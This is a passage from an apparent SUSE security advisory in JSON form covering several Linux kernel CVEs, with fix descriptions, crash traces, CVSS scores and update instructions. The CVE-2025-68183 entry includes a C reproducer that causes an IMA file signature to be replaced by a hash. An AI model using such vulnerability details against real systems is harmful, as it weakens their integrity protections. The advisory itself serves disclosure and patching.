knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 00000006485c2000 CR4: 0000000000f50ef0\n PKRU: 55555554\n\nFix this by checking pipe_ctx-\u003e\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68180",
"url": "https://www.suse.com/security/cve/CVE-2025-68180"
},
{
"category": "external",
"summary": "SUSE Bug 1255252 for CVE-2025-68180",
"url": "https://bugzilla.suse.com/1255252"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68180"
},
{
"cve": "CVE-2025-68183",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68183"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nima: don\u0027t clear IMA_DIGSIG flag when setting or removing non-IMA xattr\n\nCurrently when both IMA and EVM are in fix mode, the IMA signature will\nbe reset to IMA hash if a program first stores IMA signature in\nsecurity.ima and then writes/removes some other security xattr for the\nfile.\n\nFor example, on Fedora, after booting the kernel with \"ima_appraise=fix\nevm=fix ima_policy=appraise_tcb\" and installing rpm-plugin-ima,\ninstalling/reinstalling a package will not make good reference IMA\nsignature generated. Instead IMA hash is generated,\n\n # getfattr -m - -d -e hex /usr/bin/bash\n # file: usr/bin/bash\n security.ima=0x0404...\n\nThis happens because when setting security.selinux, the IMA_DIGSIG flag\nthat had been set early was cleared. As a result, IMA hash is generated\nwhen the file is closed.\n\nSimilarly, IMA signature can be cleared on file close after removing\nsecurity xattr like security.evm or setting/removing ACL.\n\nPrevent replacing the IMA file signature with a file hash, by preventing\nthe IMA_DIGSIG flag from being reset.\n\nHere\u0027s a minimal C reproducer which sets security.selinux as the last\nstep which can also replaced by removing security.evm or setting ACL,\n\n #include \u003cstdio.h\u003e\n #include \u003csys/xattr.h\u003e\n #include \u003cfcntl.h\u003e\n #include \u003cunistd.h\u003e\n #include \u003cstring.h\u003e\n #include \u003cstdlib.h\u003e\n\n int main() {\n const char* file_path = \"/usr/sbin/test_binary\";\n const char* hex_string = \"030204d33204490066306402304\";\n int length = strlen(hex_string);\n char* ima_attr_value;\n int fd;\n\n fd = open(file_path, O_WRONLY|O_CREAT|O_EXCL, 0644);\n if (fd == -1) {\n perror(\"Error opening file\");\n return 1;\n }\n\n ima_attr_value = (char*)malloc(length / 2 );\n for (int i = 0, j = 0; i \u003c length; i += 2, j++) {\n sscanf(hex_string + i, \"%2hhx\", \u0026ima_attr_value[j]);\n }\n\n if (fsetxattr(fd, \"security.ima\", ima_attr_value, length/2, 0) == -1) {\n perror(\"Error setting extended attribute\");\n close(fd);\n return 1;\n }\n\n const char* selinux_value= \"system_u:object_r:bin_t:s0\";\n if (fsetxattr(fd, \"security.selinux\", selinux_value, strlen(selinux_value), 0) == -1) {\n perror(\"Error setting extended attribute\");\n close(fd);\n return 1;\n }\n\n close(fd);\n\n return 0;\n }",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68183",
"url": "https://www.suse.com/security/cve/CVE-2025-68183"
},
{
"category": "external",
"summary": "SUSE Bug 1255251 for CVE-2025-68183",
"url": "https://bugzilla.suse.com/1255251"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68183"
},
{
"cve": "CVE-2025-68185",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68185"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfs4_setup_readdir(): insufficient locking for -\u003ed_parent-\u003ed_inode dereferencing\n\nTheoretically it\u0027s an oopsable race, but I don\u0027t believe one can manage\nto hit it on real hardware; might become doable on a KVM, but it still\nwon\u0027t be easy to attack.\n\nAnyway, it\u0027s easy to deal with - since xdr_encode_hyper() is just a call of\nput_unaligned_be64(), we can put that under -\u003ed_lock and be done with that.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68185",
"url": "https://www.suse.com/security/cve/CVE-2025-68185"
},
{
"category": "external",
"summary": "SUSE Bug 1255135 for CVE-2025-68185",
"url": "https://bugzilla.suse.com/1255135"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68185"
},
{
"cve": "CVE-2025-68188",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68188"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check()\n\nUse RCU to avoid a pair of atomic operations and a potential\nUAF on dst_dev()-\u003eflags.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68188",
"url": "https://www.suse.com/security/cve/CVE-2025-68188"
},
{
"category": "external",
"summary": "SUSE Bug 1255269 for CVE-2025-68188",
"url": "https://bugzilla.suse.com/1255269"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68188"
},
{
"cve": "CVE-2025-68190",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68190"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu/atom: Check kcalloc() for WS buffer in amdgpu_atom_execute_table_locked()\n\nkcalloc() may fail. When WS is non-zero and allocation fails, ectx.ws\nremains NULL while ectx.ws_size is set, leading to a potential NULL\npointer dereference in atom_get_src_int() when accessing WS entries.\n\nReturn -ENOMEM on allocation failure to avoid the NULL dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68190",
"url": "https://www.suse.com/security/cve/CVE-2025-68190"
},
{
"category": "external",
"summary": "SUSE Bug 1255131 for CVE-2025-68190",
"url": "https://bugzilla.suse.com/1255131"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68190"
},
{
"cve": "CVE-2025-68192",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68192"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: qmi_wwan: initialize MAC header offset in qmimux_rx_fixup\n\nRaw IP packets have no MAC header, leaving skb-\u003emac_header uninitialized.\nThis can trigger kernel panics on ARM64 when xfrm or other subsystems\naccess the offset due to strict alignment checks.\n\nInitialize the MAC header to prevent such crashes.\n\nThis can trigger kernel panics on ARM when running IPsec over the\nqmimux0 interface.\n\nExample trace:\n\n Internal error: Oops: 000000009600004f [#1] SMP\n CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.12.34-gbe78e49cb433 #1\n Hardware name: LS1028A RDB Board (DT)\n pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : xfrm_input+0xde8/0x1318\n lr : xfrm_input+0x61c/0x1318\n sp : ffff800080003b20\n Call trace:\n xfrm_input+0xde8/0x1318\n xfrm6_rcv+0x38/0x44\n xfrm6_esp_rcv+0x48/0xa8\n ip6_protocol_deliver_rcu+0x94/0x4b0\n ip6_input_finish+0x44/0x70\n ip6_input+0x44/0xc0\n ipv6_rcv+0x6c/0x114\n __netif_receive_skb_one_core+0x5c/0x8c\n __netif_receive_skb+0x18/0x60\n process_backlog+0x78/0x17c\n __napi_poll+0x38/0x180\n net_rx_action+0x168/0x2f0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68192",
"url": "https://www.suse.com/security/cve/CVE-2025-68192"
},
{
"category": "external",
"summary": "SUSE Bug 1255246 for CVE-2025-68192",
"url": "https://bugzilla.suse.com/1255246"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68192"
},
{
"cve": "CVE-2025-68194",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68194"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: imon: make send_packet() more robust\n\nsyzbot is reporting that imon has three problems which result in\nhung tasks due to forever holding device lock [1].\n\nFirst problem is that when usb_rx_callback_intf0() once got -EPROTO error\nafter ictx-\u003edev_present_intf0 became true, usb_rx_callback_intf0()\nresubmits urb after printk(), and resubmitted urb causes\nusb_rx_callback_intf0() to again get -EPROTO error. This results in\nprintk() flooding (RCU stalls).\n\nAlan Stern commented [2] that\n\n In theory it\u0027s okay to resubmit _if_ the driver has a robust\n error-recovery scheme (such as giving up after some fixed limit on the\n number of errors or after some fixed time has elapsed, perhaps with a\n time delay to prevent a flood of errors). Most drivers don\u0027t bother to\n do this; they simply give up right away. This makes them more\n vulnerable to short-term noise interference during USB transfers, but in\n reality such interference is quite rare. There\u0027s nothing really wrong\n with giving up right away.\n\nbut imon has a poor error-recovery scheme which just retries forever;\nthis behavior should be fixed.\n\nSince I\u0027m not sure whether it is safe for imon users to give up upon any\nerror code, this patch takes care of only union of error codes chosen from\nmodules in drivers/media/rc/ directory which handle -EPROTO error (i.e.\nir_toy, mceusb and igorplugusb).\n\nSecond problem is that when usb_rx_callback_intf0() once got -EPROTO error\nbefore ictx-\u003edev_present_intf0 becomes true, usb_rx_callback_intf0() always\nresubmits urb due to commit 8791d63af0cf (\"[media] imon: don\u0027t wedge\nhardware after early callbacks\"). Move the ictx-\u003edev_present_intf0 test\nintroduced by commit 6f6b90c9231a (\"[media] imon: don\u0027t parse scancodes\nuntil intf configured\") to immediately before imon_incoming_packet(), or\nthe first problem explained above happens without printk() flooding (i.e.\nhung task).\n\nThird problem is that when usb_rx_callback_intf0() is not called for some\nreason (e.g. flaky hardware; the reproducer for this problem sometimes\nprevents usb_rx_callback_intf0() from being called),\nwait_for_completion_interruptible() in send_packet() never returns (i.e.\nhung task). As a workaround for such situation, change send_packet() to\nwait for completion with timeout of 10 seconds.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68194",
"url": "https://www.suse.com/security/cve/CVE-2025-68194"
},
{
"category": "external",
"summary": "SUSE Bug 1255325 for CVE-2025-68194",
"url": "https://bugzilla.suse.com/1255325"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68194"
},
{
"cve": "CVE-2025-68195",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68195"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/CPU/AMD: Add missing terminator for zen5_rdseed_microcode\n\nRunning x86_match_min_microcode_rev() on a Zen5 CPU trips up KASAN for an out\nof bounds access.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68195",
"url": "https://www.suse.com/security/cve/CVE-2025-68195"
},
{
"category": "external",
"summary": "SUSE Bug 1255259 for CVE-2025-68195",
"url": "https://bugzilla.suse.com/1255259"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68195"
},
{
"cve": "CVE-2025-68200",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68200"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Add bpf_prog_run_data_pointers()\n\nsyzbot found that cls_bpf_classify() is able to change\ntc_skb_cb(skb)-\u003edrop_reason triggering a warning in sk_skb_reason_drop().\n\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 __sk_skb_reason_drop net/core/skbuff.c:1189 [inline]\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 sk_skb_reason_drop+0x76/0x170 net/core/skbuff.c:1214\n\nstruct tc_skb_cb has been added in commit ec624fe740b4 (\"net/sched:\nExtend qdisc control block with tc control block\"), which added a wrong\ninteraction with db58ba459202 (\"bpf: wire in data and data_end for\ncls_act_bpf\").\n\ndrop_reason was added later.\n\nAdd bpf_prog_run_data_pointers() helper to save/restore the net_sched\nstorage colliding with BPF data_meta/data_end.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68200",
"url": "https://www.suse.com/security/cve/CVE-2025-68200"
},
{
"category": "external",
"summary": "SUSE Bug 1255241 for CVE-2025-68200",
"url": "https://bugzilla.suse.com/1255241"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68200"
},
{
"cve": "CVE-2025-68201",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68201"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: remove two invalid BUG_ON()s\n\nThose can be triggered trivially by userspace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68201",
"url": "https://www.suse.com/security/cve/CVE-2025-68201"
},
{
"category": "external",
"summary": "SUSE Bug 1255136 for CVE-2025-68201",
"url": "https://bugzilla.suse.com/1255136"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68201"
},
{
"cve": "CVE-2025-68204",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68204"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npmdomain: arm: scmi: Fix genpd leak on provider registration failure\n\nIf of_genpd_add_provider_onecell() fails during probe, the previously\ncreated generic power domains are not removed, leading to a memory leak\nand potential kernel crash later in genpd_debug_add().\n\nAdd proper error handling to unwind the initialized domains before\nreturning from probe to ensure all resources are correctly released on\nfailure.\n\nExample crash trace observed without this fix:\n\n | Unable to handle kernel paging request at virtual address fffffffffffffc70\n | CPU: 1 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.18.0-rc1 #405 PREEMPT\n | Hardware name: ARM LTD ARM Juno Development Platform/ARM Juno Development Platform\n | pstate: 00000005 (nzcv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n | pc : genpd_debug_add+0x2c/0x160\n | lr : genpd_debug_init+0x74/0x98\n | Call trace:\n | genpd_debug_add+0x2c/0x160 (P)\n | genpd_debug_init+0x74/0x98\n | do_one_initcall+0xd0/0x2d8\n | do_initcall_level+0xa0/0x140\n | do_initcalls+0x60/0xa8\n | do_basic_setup+0x28/0x40\n | kernel_init_freeable+0xe8/0x170\n | kernel_init+0x2c/0x140\n | ret_from_fork+0x10/0x20",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68204",
